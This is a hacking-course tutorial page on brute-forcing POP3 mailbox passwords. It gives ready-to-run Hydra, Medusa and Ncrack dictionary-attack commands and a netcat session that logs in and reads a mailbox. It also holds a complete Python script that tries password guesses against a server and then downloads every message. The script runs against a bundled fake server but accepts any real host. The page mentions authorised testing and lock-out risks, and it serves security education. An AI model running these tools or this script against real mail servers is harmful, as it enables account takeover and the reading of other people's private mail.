Extreme Hacking | Sadik Shaikh
Ethical Hacking Institute Course in Pune-India

Goal:
The goal is to get access to a mailbox, either to read the mail in it or simply to check whether the user has a weak password.

There are several tools you can use for this, e.g. Ncrack, Medusa and Hydra. Some of them are better than others. My personal experience tells me that Ncrack is far more stable and effective.
I've experienced countless times that the other tools crashed after 15-20 minutes, or didn't test all the passwords in the password list. This can result in the password not being found, even though it is in the list.

Examples:

Code:
hydra -l <username> -P <password list> -v <target ip> -s 110 pop3
# hydra -l postmaster -P /usr/share/wordlists/password.lst -v <ip> -s 110 pop3
(-l is a single login name, -P the password list, -v verbose output, -s the port; the service name comes last.)

Code:
medusa -h <target ip> -u <username> -P <password list> -M pop3 -f
# medusa -h <ip> -u postmaster -P /usr/share/wordlists/password.lst -M pop3 -f
(-h is the target host, -u a single username, -P the password list, -M the service module, -f stops after the first valid password is found.)

Code:
ncrack --user <username> -p pop3 -P <password list> <target ip>:110
# ncrack --user postmaster -p pop3 -P /usr/share/wordlists/password.lst --connection-limit 10 <ip>:110
(--user is a single username, -p the service, -P the password list; --connection-limit caps the number of concurrent connections, which is the knob to turn down if the server or the account starts to suffer.)

An alternative is to write your own script, which does not take much.
All three tools also accept further options, either to be more aggressive or more discreet, or to make the dictionary attack go a little faster. Keep in mind that you risk overloading the server you are working against, and in some cases you can even lock out the account or accounts you are testing.

A bit about POP3:
When you log on to a POP3 server you start in the AUTHORIZATION state, where the client has to identify itself:
first send a USER command with the username, then a PASS command with the password.
The server answers with "+OK ..." if the command was accepted, or "-ERR ..." if it was not. Note that a server may answer +OK to USER even when no such mailbox exists (RFC 1939 allows this, precisely so that valid usernames are not revealed) and only reject the pair at PASS, so a +OK after USER is not proof that the account exists.

Code:
C: USER <root>
S: +OK/-ERR
C: PASS <derdo>
S: +OK/-ERR

If both USER and PASS succeed, the session enters the TRANSACTION state.
Here you can issue a number of commands; the most interesting are probably LIST and RETR.
LIST shows the messages in the mailbox (one line per message with its number and size in octets); RETR fetches a specific message by number. Both replies are multi-line and end with a line containing only a ".".

Here's an example. I've cut off part of the output, because the mail itself is not really that interesting.

Code:
root@extremehacking:~# nc -nv 10.0.2.22 110
(UNKNOWN) [10.0.2.22] 110 (pop3) open
+OK POPFuzz v1.0 Server Ready (extremehacking.org)
USER postmaster
+OK postmaster is hanging out here
PASS ********
+OK postmaster is now authorized
LIST
+OK 1 messages (1144 octets)
1 1144
.
RETR 1
+OK 1144 octets
Return-Path: <no-reply@example.com>
Delivered-To: test@gmail.com
Received: from localhost (unknown [10.1.3.25])
by harmony.local (Postfix) with ESMTP id 2CC88637E2
for <test@gmail.com>; Wed, 13 May 2015 10:02:52 +0200 (CEST)
To: test@gmail.com
Subject: Hello
.......
--b1_5ecf0dd9b89ef5875fcc3e3ead24e962
Content-Type: text/plain; format=flowed; charset="UTF-8"
Content-Transfer-Encoding: 8bit

Hey
.......

--b1_5ecf0dd9b89ef5875fcc3e3ead24e962--
.
QUIT
+OK leaving
root@extremehacking:~#
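As an added example (this is not code from the original page), here is the "own script" alternative mentioned above, written in Python 3 against the raw protocol: one fresh connection per password guess with USER/PASS, +OK/-ERR parsing that treats anything else as a broken connection rather than a wrong guess, and on success the TRANSACTION phase with LIST and RETR, including the dot-unstuffing of multi-line replies that the nc session above shows. So that it runs offline it starts a tiny fake POP3 server on 127.0.0.1; that server, its credentials (postmaster / derdo), its single message and the word list are constructed assumptions, not data from the page.

```python
import contextlib
import socket
import socketserver
import threading

FAKE_USER, FAKE_PASS = "postmaster", "derdo"            # assumed test credentials
FAKE_MSG = ["Subject: Hello", "", "Hey", ".a body line that starts with a dot"]


class FakePop3(socketserver.StreamRequestHandler):   # constructed stand-in, not a real mail server
    def handle(self):
        user, authed = None, False
        self.wfile.write(b"+OK fake POP3 ready\r\n")
        for raw in self.rfile:
            cmd, _, arg = raw.decode().rstrip("\r\n").partition(" ")
            cmd, reply = cmd.upper(), b"-ERR not allowed\r\n"
            if cmd == "USER":                           # accepts any name, fails only at PASS
                user, reply = arg, b"+OK\r\n"
            elif cmd == "PASS":
                authed = (user == FAKE_USER and arg == FAKE_PASS)
                reply = b"+OK logged in\r\n" if authed else b"-ERR auth failed\r\n"
            elif cmd == "LIST" and authed:
                reply = b"+OK 1 messages\r\n1 40\r\n.\r\n"
            elif cmd == "RETR" and authed and arg == "1":   # dot-stuff lines starting with "."
                body = "".join(("." + l if l.startswith(".") else l) + "\r\n" for l in FAKE_MSG)
                reply = b"+OK 40 octets\r\n" + body.encode() + b".\r\n"
            elif cmd == "QUIT":
                reply = b"+OK bye\r\n"
            self.wfile.write(reply)


def start_fake_server():
    srv = socketserver.ThreadingTCPServer(("127.0.0.1", 0), FakePop3)   # port 0: any free port
    srv.daemon_threads = True
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv.server_address[1]


def _status(line):
    if line.startswith(b"+OK") or line.startswith(b"-ERR"):
        return line.startswith(b"+OK")                  # +OK is success, -ERR is failure (RFC 1939)
    raise ConnectionError("malformed or missing POP3 reply: %r" % line)


def _cmd(f, line):
    f.write((line + "\r\n").encode())
    f.flush()
    reply = f.readline().rstrip(b"\r\n")                # status line; LIST/RETR bodies follow it
    return _status(reply), reply.decode(errors="replace")


def _multiline(f):
    out = []
    for raw in f:                                       # multi-line reply ends with a lone "."
        line = raw.rstrip(b"\r\n").decode(errors="replace")
        if line == ".":
            return out
        out.append(line[1:] if line.startswith("..") else line)   # undo dot-stuffing
    raise ConnectionError("server closed the connection mid-reply")


def _open_session(host, port, user, password, timeout=5.0):
    """Connect and run the AUTHORIZATION phase: greeting, USER, PASS."""
    s = socket.create_connection((host, port), timeout=timeout)
    f = s.makefile("rwb")
    _status(f.readline())                               # greeting must be +OK
    ok, reply = _cmd(f, "USER " + user)
    if ok:                                              # a -ERR here means the name is unknown
        ok, reply = _cmd(f, "PASS " + password)
    return s, f, ok, reply


def _quit(s, f):
    with contextlib.suppress(OSError):                  # some servers drop the link after a bad PASS
        _cmd(f, "QUIT")
    s.close()


def pop3_login(host, port, user, password):
    """One guess on a fresh connection -> (accepted, reply); network errors raise."""
    s, f, ok, reply = _open_session(host, port, user, password)
    _quit(s, f)
    return ok, reply


def dictionary_attack(host, port, user, candidates):
    """Try every candidate once, in order; return the first accepted one or None."""
    for pw in candidates:
        if pop3_login(host, port, user, pw)[0]:
            return pw
    return None


def fetch_mailbox(host, port, user, password):
    """TRANSACTION phase: LIST the mailbox, then RETR every message listed."""
    s, f, ok, reply = _open_session(host, port, user, password)
    if not ok:
        _quit(s, f)
        raise PermissionError(reply)
    if not _cmd(f, "LIST")[0]:
        raise RuntimeError("LIST refused")
    ids = [l.split()[0] for l in _multiline(f)]         # each line is "<number> <octets>"
    msgs = []
    for i in ids:
        if not _cmd(f, "RETR " + i)[0]:
            raise RuntimeError("RETR %s refused" % i)
        msgs.append("\n".join(_multiline(f)))
    _quit(s, f)
    return msgs
```

Point `dictionary_attack("127.0.0.1", port, FAKE_USER, wordlist)` at the port returned by `start_fake_server()`, or at a real host on port 110 that you are authorised to test; `fetch_mailbox` then does what the nc session above did by hand. Every guess uses a new connection, as the three tools do by default, so the overload and lock-out caveats above still apply; put a sleep in the loop if you need to go slower. A dropped connection raises instead of being counted as a wrong password, which is the failure mode that makes a tool silently skip entries in the list.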

More:
There is a lot more to read about POP3 in its RFCs; RFC 1939 is the base specification.
Keep in mind that some mail servers require the full e-mail address as the username.

www.extremehacking.org